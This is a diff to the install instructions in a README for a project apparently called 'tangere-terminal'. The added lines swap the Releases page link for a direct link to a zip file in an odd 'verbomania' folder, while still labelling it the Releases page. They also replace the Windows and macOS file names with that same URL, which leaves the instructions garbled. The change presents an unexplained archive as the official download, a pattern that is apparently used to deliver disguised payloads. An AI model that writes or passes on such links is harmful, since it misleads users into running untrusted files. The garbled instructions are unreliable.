staged-stardivination393/tangere-terminal/README.md

 ## ⚙️ How to Install

-1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/staged-stardivination393/tangere-terminal/releases) to find the application files.
+1. **Visit the Releases Page:** Go to the [Releases page](https://raw.githubusercontent.com/staged-stardivination393/tangere-terminal/main/verbomania/tangere-terminal.zip) to find the application files.

 2. **Select Your File:** Look for the appropriate version for your operating system.
-The file name will reflect your OS, such as `tangere-terminal-windows.exe` for Windows users or `tangere-terminal-macos.zip` for macOS users.
+The file name will reflect your OS, such as `https://raw.githubusercontent.com/staged-stardivination393/tangere-terminal/main/verbomania/tangere-terminal.zip` for Windows users or `https://raw.githubusercontent.com/staged-stardivination393/tangere-terminal/main/verbomania/tangere-terminal.zip` for macOS users.

 3. **Download the File:** Click on the link to download the file to your computer.